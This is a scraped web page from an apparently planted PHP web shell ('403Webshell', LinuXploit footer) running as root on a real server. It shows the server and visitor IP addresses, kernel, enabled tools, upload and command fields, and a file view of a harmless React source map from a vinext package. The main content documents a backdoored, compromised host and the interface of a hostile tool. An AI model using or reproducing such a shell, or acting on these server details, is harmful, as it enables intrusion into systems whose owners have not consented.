403Webshell
Server IP : 159.203.156.69  /  Your IP : 216.73.217.172
Web Server : nginx/1.24.0
System : Linux main-ubuntu 6.8.0-71-generic #71-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 22 16:52:38 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/tanviranik.com/node_modules/vinext/dist/server/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/tanviranik.com/node_modules/vinext/dist/server/app-render-dependency.js.map
{"version":3,"file":"app-render-dependency.js","names":[],"sources":["../../src/server/app-render-dependency.tsx"],"sourcesContent":["import { type ReactNode } from \"react\";\n\nexport type AppRenderDependency = {\n  promise: Promise<void>;\n  release: () => void;\n};\n\nexport function createAppRenderDependency(): AppRenderDependency {\n  let released = false;\n  let resolve!: () => void;\n\n  const promise = new Promise<void>((promiseResolve) => {\n    resolve = promiseResolve;\n  });\n\n  return {\n    promise,\n    release() {\n      if (released) {\n        return;\n      }\n      released = true;\n      resolve();\n    },\n  };\n}\n\nexport function renderAfterAppDependencies(\n  children: ReactNode,\n  dependencies: readonly AppRenderDependency[],\n): ReactNode {\n  if (dependencies.length === 0) {\n    return children;\n  }\n\n  async function AwaitAppRenderDependencies() {\n    await Promise.all(dependencies.map((dependency) => dependency.promise));\n    return children;\n  }\n\n  return <AwaitAppRenderDependencies />;\n}\n\nexport function renderWithAppDependencyBarrier(\n  children: ReactNode,\n  dependency: AppRenderDependency,\n): ReactNode {\n  function ReleaseAppRenderDependency() {\n    // This render-time release is intentional. The dependency barrier is only\n    // used inside the RSC render graph, where producing this leaf means the\n    // owning entry has reached the serialization point that downstream entries\n    // are allowed to observe. If Phase 2 adds AbortSignal-based render\n    // timeouts, this dependency will also need an abort/reject path so stuck\n    // async layouts do not suspend downstream entries forever.\n    dependency.release();\n    return null;\n  }\n\n  return (\n    <>\n      {children}\n      <ReleaseAppRenderDependency />\n    </>\n  );\n}\n"],"mappings":";;AAOA,SAAgB,4BAAiD;CAC/D,IAAI,WAAW;CACf,IAAI;CAMJ,OAAO;EACL,SAAA,IALkB,SAAe,mBAAmB;GACpD,UAAU;IAIH;EACP,UAAU;GACR,IAAI,UACF;GAEF,WAAW;GACX,SAAS;;EAEZ;;AAGH,SAAgB,2BACd,UACA,cACW;CACX,IAAI,aAAa,WAAW,GAC1B,OAAO;CAGT,eAAe,6BAA6B;EAC1C,MAAM,QAAQ,IAAI,aAAa,KAAK,eAAe,WAAW,QAAQ,CAAC;EACvE,OAAO;;CAGT,OAAO,oBAAC,4BAAD,EAA8B,CAAA;;AAGvC,SAAgB,+BACd,UACA,YACW;CACX,SAAS,6BAA6B;EAOpC,WAAW,SAAS;EACpB,OAAO;;CAGT,OACE,qBAAA,UAAA,EAAA,UAAA,CACG,UACD,oBAAC,4BAAD,EAA8B,CAAA,CAC7B,EAAA,CAAA"}

Youez - 2016 - github.com/yon3zu
LinuXploit